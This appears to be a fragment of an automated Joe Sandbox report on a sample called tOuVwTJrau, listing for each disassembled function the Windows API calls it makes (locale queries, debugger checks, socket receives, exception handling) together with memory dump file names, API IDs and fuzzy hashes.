                                                                • GetACP.KERNEL32(?,?,00322FC0,?,00000000), ref: 00322D79
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: InfoLocale
                                                                • String ID: ACP$OCP
                                                                • API String ID: 2299586839-711371036
                                                                • Opcode ID: 62cd4219672e1c96cef0086f53cd093a68cc18fe2223cada5dfc8980ad1ca929
                                                                • Instruction ID: d6b01a7ea23122765bdb0da473a39b4150ae36e40e544f1ae0a8163a915dbfa1
                                                                • Opcode Fuzzy Hash: 62cd4219672e1c96cef0086f53cd093a68cc18fe2223cada5dfc8980ad1ca929
                                                                • Instruction Fuzzy Hash: 8A21D032A00124BBDB378B24ED01B9BB3AAFB50B50F578024E91ADB214EB32DD41C390
                                                                APIs
                                                                • GetVersionExW.KERNEL32(0000011C,AA6E0749,0000000F,00000000), ref: 002E944A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: Version
                                                                • String ID:
                                                                • API String ID: 1889659487-0
                                                                • Opcode ID: 3db7bc54a1dddb7915f9bfcdaaeecc31d9068914829322d780044bc752784f16
                                                                • Instruction ID: 204e24a5946fdd8aa60611436ef3f4042ea61f3a280beabc7e9395668aeffd8d
                                                                • Opcode Fuzzy Hash: 3db7bc54a1dddb7915f9bfcdaaeecc31d9068914829322d780044bc752784f16
                                                                • Instruction Fuzzy Hash: 0A61FAB0D502849BDF21AF66CD5A7ED7BB5EB02310F90029EE4059B3C2DB745AD48BC2
                                                                APIs
                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0030A8A1
                                                                • IsDebuggerPresent.KERNEL32 ref: 0030A96D
                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0030A98D
                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 0030A997
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                • String ID:
                                                                • API String ID: 254469556-0
                                                                • Opcode ID: 3d4f7b54b9dd7aa0214a51fb4c8d3def3cf096bde02c83c82332293ff2162d51
                                                                • Instruction ID: 8666a2dbde3b6a4182190b3a7eff3771d3cfecc9a9489d851e7e45e379d2815a
                                                                • Opcode Fuzzy Hash: 3d4f7b54b9dd7aa0214a51fb4c8d3def3cf096bde02c83c82332293ff2162d51
                                                                • Instruction Fuzzy Hash: F5311875E0631C9BDB21DFA4D9897CDBBB8BF08300F1041AAE50DAB290EB705A85CF45
                                                                APIs
                                                                  • Part of subcall function 003171C0: GetLastError.KERNEL32(?,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 003171C5
                                                                  • Part of subcall function 003171C0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 00317263
                                                                  • Part of subcall function 003171C0: _free.LIBCMT ref: 00317222
                                                                  • Part of subcall function 003171C0: _free.LIBCMT ref: 00317258
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0032297D
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 003229C7
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00322A8D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: InfoLocale$ErrorLast_free
                                                                • String ID:
                                                                • API String ID: 3140898709-0
                                                                • Opcode ID: d9445d41178086a8754c42ef89710d6d1a4f067b5eb2c8c04355fcddfbd90387
                                                                • Instruction ID: 766a8ca433b32f0fa62d77c3824e7e3b7726ddee7910e00c9cb1237cca758e92
                                                                • Opcode Fuzzy Hash: d9445d41178086a8754c42ef89710d6d1a4f067b5eb2c8c04355fcddfbd90387
                                                                • Instruction Fuzzy Hash: 3C618171A00127AFDF3A9F28EC82BBB77A8FF04300F154169E905DA685EB74D995CB50
                                                                APIs
                                                                • recv.WS2_32(?,?,00000004,00000000), ref: 002F275B
                                                                • recv.WS2_32(?,?,00000008,00000000), ref: 002F2790
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: recv
                                                                • String ID:
                                                                • API String ID: 1507349165-0
                                                                • Opcode ID: 17bf8f40af5b575cd7a87231b5eb548b7e8e64bf5e765b13e5dad1d638266d49
                                                                • Instruction ID: 362c56710cc82b2c0e75d7c89c10b900cdf097b98db8d5f6eb712c04a104a6bd
                                                                • Opcode Fuzzy Hash: 17bf8f40af5b575cd7a87231b5eb548b7e8e64bf5e765b13e5dad1d638266d49
                                                                • Instruction Fuzzy Hash: A231C47590020D9BD711CB68DC85BFBFBACEB0A764F140226E915EB2D1CB74AC058BA0
                                                                APIs
                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0030F355
                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0030F35F
                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0030F36C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                • String ID:
                                                                • API String ID: 3906539128-0
                                                                • Opcode ID: 8665484ee075649ed3c2253029024543abaa2ba008f5f8304040b2061677978b
                                                                • Instruction ID: 87c0fd79abf10fbfe7b585533611de480cc4fd0c19ec495cc8973f45cd4aa497
                                                                • Opcode Fuzzy Hash: 8665484ee075649ed3c2253029024543abaa2ba008f5f8304040b2061677978b
                                                                • Instruction Fuzzy Hash: 5531C4749023189BCB22DF64D9897DDBBB8BF08310F5046EAE40CA7291EB749F818F45
                                                                APIs
                                                                  • Part of subcall function 003171C0: GetLastError.KERNEL32(?,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 003171C5
                                                                  • Part of subcall function 003171C0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 00317263
                                                                • EnumSystemLocalesW.KERNEL32(00322929,00000001,00000000,?,-00000050,?,00322F57,00000000,?,?,?,00000055,?), ref: 00322875
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                • String ID: W/2
                                                                • API String ID: 2417226690-1283033290
                                                                • Opcode ID: 409f4b79616ed8e9cd7596bd32071f92b9489d86b67bb9479e8c90453e5e80b2
                                                                • Instruction ID: aeb774cfc0907cfe78eb1e3494d6d425bc36c159d1d38d9e28540dd5e4987463
                                                                • Opcode Fuzzy Hash: 409f4b79616ed8e9cd7596bd32071f92b9489d86b67bb9479e8c90453e5e80b2
                                                                • Instruction Fuzzy Hash: 5811293A200705AFDB199F79EC916BBB791FF80318B15483DEA4647640D771A842CB40
                                                                APIs
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00316122,?,20001004,00000000,00000002,?,?,0031572F), ref: 00318E02
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: InfoLocale
                                                                • String ID: `&0
                                                                • API String ID: 2299586839-1385275834
                                                                • Opcode ID: 309f0f05b251c7f719ef9f602a50094a5faa0f17e9346cd7d0ac48de302f91bb
                                                                • Instruction ID: 7aee8726f5f7ec1f810ab43f02d206cb0eef187b8ceac6f5f92962f876b5b9e8
                                                                • Opcode Fuzzy Hash: 309f0f05b251c7f719ef9f602a50094a5faa0f17e9346cd7d0ac48de302f91bb
                                                                • Instruction Fuzzy Hash: EAE04F36540228BBCF172F61EC08EEE3F1AEF48761F154411FD0566260CF728961AAD9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0ac2c11185d8fc5ad81346666ec16ea2fa478ee6a3bab73839346bcea6eaf536
                                                                • Instruction ID: 66e459fc7a3291f202d7bd366dbc31cf35fd42a090c87f28985596677f558861
                                                                • Opcode Fuzzy Hash: 0ac2c11185d8fc5ad81346666ec16ea2fa478ee6a3bab73839346bcea6eaf536
                                                                • Instruction Fuzzy Hash: 4FF130B5E012199FDF19CFA9C8806EEBBB1FF48314F158269D815AB384D7319E41CB90
                                                                APIs
                                                                • _free.LIBCMT ref: 0031F07F
                                                                  • Part of subcall function 003185A6: HeapFree.KERNEL32(00000000,00000000,?,0032154C,?,00000000,?,?,?,003217EF,?,00000007,?,?,00321C94,?), ref: 003185BC
                                                                  • Part of subcall function 003185A6: GetLastError.KERNEL32(?,?,0032154C,?,00000000,?,?,?,003217EF,?,00000007,?,?,00321C94,?,?), ref: 003185CE
                                                                • GetTimeZoneInformation.KERNEL32 ref: 0031F091
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: ErrorFreeHeapInformationLastTimeZone_free
                                                                • String ID:
                                                                • API String ID: 3107070095-0
                                                                • Opcode ID: 0fab5116c2e42756d5100bc6d2722156838900a87e3645ecedcacd67fb302803
                                                                • Instruction ID: ec3c1ce11d3f6c511e25c7e8f7ee36e1c408509a87faf4d63efbcdd844deff01
                                                                • Opcode Fuzzy Hash: 0fab5116c2e42756d5100bc6d2722156838900a87e3645ecedcacd67fb302803
                                                                • Instruction Fuzzy Hash: 4421A575901120AFCB1BAF65CC02BDABFB4EF49310F158167F905AF1A1D731A950DB90
                                                                APIs
                                                                • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,002E7EE2,00000000,AA6E0749), ref: 003121F6
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00312227
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                • String ID:
                                                                • API String ID: 1518329722-0
                                                                • Opcode ID: ea36f6aa5b9e4127fb682c432e762431730d65eb7ade3602980d29d132eba154
                                                                • Instruction ID: a6850be5286f885be30d26a7c14802ac0c5f0f46a6151fadce3c381b4cbb7abb
                                                                • Opcode Fuzzy Hash: ea36f6aa5b9e4127fb682c432e762431730d65eb7ade3602980d29d132eba154
                                                                • Instruction Fuzzy Hash: 12F02B34900204BBDB0EDF64CC46FEE76E9EB48325F204A48A402E6180D674EA418750
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: <o4$<o4
                                                                • API String ID: 0-2656834769
                                                                • Opcode ID: 321a268a1dd6db27f8ad8564012da6d6fc36e2e2dc3096d09d0a3d13f75788ea
                                                                • Instruction ID: eb6e31ffae780ab07243f05d1ca87c653acfbd6e111735327aa9894c63de8393
                                                                • Opcode Fuzzy Hash: 321a268a1dd6db27f8ad8564012da6d6fc36e2e2dc3096d09d0a3d13f75788ea
                                                                • Instruction Fuzzy Hash: 21916534A246C98FDB12CF69C4907EEBBF6EF5A304F94455CE4949B782C3768506CBA0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: <o4$<o4
                                                                • API String ID: 0-2656834769
                                                                • Opcode ID: d8539a7383f4de503e0dcdb6f2b298fb1e2beef680df9f23c5bcf9cd04d9d8ad
                                                                • Instruction ID: f106b848c74a77347b374de6707a75e62509d11dd00b27caf1b6b4b9fe4ee640
                                                                • Opcode Fuzzy Hash: d8539a7383f4de503e0dcdb6f2b298fb1e2beef680df9f23c5bcf9cd04d9d8ad
                                                                • Instruction Fuzzy Hash: A7814774E246A68FDB05CF69D4907EEBBF5FB1A304F8402A9D85097383C3719855CBA0
                                                                APIs
                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0031CDC8,?,?,00000008,?,?,00326890,00000000), ref: 0031CFFA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: ExceptionRaise
                                                                • String ID:
                                                                • API String ID: 3997070919-0
                                                                • Opcode ID: a8f0eeedb6bb9b13172c6d8b3aa339ef475b1987871bec0630e221a61d9a37d5
                                                                • Instruction ID: c6b3719cc69b77b3b9db04138312ebca0b80b1204247a0808ee3e298f85dc6e0
                                                                • Opcode Fuzzy Hash: a8f0eeedb6bb9b13172c6d8b3aa339ef475b1987871bec0630e221a61d9a37d5
                                                                • Instruction Fuzzy Hash: 50B14F31620605DFD71ACF28C486BA57BE1FF4D365F268658E899CF2A1C335E992CB40
                                                                APIs
                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0030AA95
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: FeaturePresentProcessor
                                                                • String ID:
                                                                • API String ID: 2325560087-0
                                                                • Opcode ID: 6f936fbc9435817730ee4bbf7825f8f1989c9d3ad42e22d842cd2f0e534600fc
                                                                • Instruction ID: c62a2f93f2bd3a0867b7933991f57a79c5c4dc76bf57180da048befd6e70ecd6
                                                                • Opcode Fuzzy Hash: 6f936fbc9435817730ee4bbf7825f8f1989c9d3ad42e22d842cd2f0e534600fc
                                                                • Instruction Fuzzy Hash: CB51D4B5D02715CFEB2ACF55E8963AEBBF5FB06310F15802AC401EB291D775A900CB91
                                                                APIs
                                                                  • Part of subcall function 003171C0: GetLastError.KERNEL32(?,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 003171C5
                                                                  • Part of subcall function 003171C0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 00317263
                                                                  • Part of subcall function 003171C0: _free.LIBCMT ref: 00317222
                                                                  • Part of subcall function 003171C0: _free.LIBCMT ref: 00317258
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00322BD0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_free$InfoLocale
                                                                • String ID:
                                                                • API String ID: 2003897158-0
                                                                • Opcode ID: ebe720404ef9497b7e689a72dbb363c127278a54796491f733304a8a5d544f81
                                                                • Instruction ID: 94a2d1a7dcd02538319eaf12f41b1718194c2a099078d0de99a5040f70519a58
                                                                • Opcode Fuzzy Hash: ebe720404ef9497b7e689a72dbb363c127278a54796491f733304a8a5d544f81
                                                                • Instruction Fuzzy Hash: D421837161522ABBDB2AAB25EC82EBF73ACEF15310F11007AFD01DA241EA74ED408654
                                                                APIs
                                                                  • Part of subcall function 003171C0: GetLastError.KERNEL32(?,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 003171C5
                                                                  • Part of subcall function 003171C0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 00317263
                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00322B45,00000000,00000000,?), ref: 00322DD4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$InfoLocale
                                                                • String ID:
                                                                • API String ID: 3736152602-0
                                                                • Opcode ID: 02daec627efab1d2a1508f6e05cf43e8ef138ca34e0a5b89c8897f6d03bf4ca3
                                                                • Instruction ID: 630d3c3b3c2044d3f98ed6caabe7e4f7cb562dfb867b7fddeb68b5d01cd0923a
                                                                • Opcode Fuzzy Hash: 02daec627efab1d2a1508f6e05cf43e8ef138ca34e0a5b89c8897f6d03bf4ca3
                                                                • Instruction Fuzzy Hash: EBF0A9325001257BDB295B65DC46ABB7768EB40754F1A0439ED16B3140EA74FE42D5D0
                                                                APIs
                                                                  • Part of subcall function 003171C0: GetLastError.KERNEL32(?,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 003171C5
                                                                  • Part of subcall function 003171C0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 00317263
                                                                • EnumSystemLocalesW.KERNEL32(00322B7C,00000001,00000000,?,-00000050,?,00322F1B,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 003228E8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                • String ID:
                                                                • API String ID: 2417226690-0
                                                                • Opcode ID: 2d57e51768bb69ef0791de5503ab982dfc78c1e121ddb704bc038b4ab9f8777f
                                                                • Instruction ID: 478f5984785ef73930e4845f46e19bc2080623d3023a8b0c292826e9d4dc8ac8
                                                                • Opcode Fuzzy Hash: 2d57e51768bb69ef0791de5503ab982dfc78c1e121ddb704bc038b4ab9f8777f
                                                                • Instruction Fuzzy Hash: 63F046363003042FDB165F38EC81ABB7B91EF81368F05443DFA018B680C6719C41D740
                                                                APIs
                                                                  • Part of subcall function 00312AE0: EnterCriticalSection.KERNEL32(-00037DA1,?,00313DC5,00000000,00344038,0000000C,00313D8C,?,?,0031ABB3,?,?,00317362), ref: 00312AEF
                                                                • EnumSystemLocalesW.KERNEL32(Function_0003889F,00000001,00344258,0000000C,00318CCA,?), ref: 003188E4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
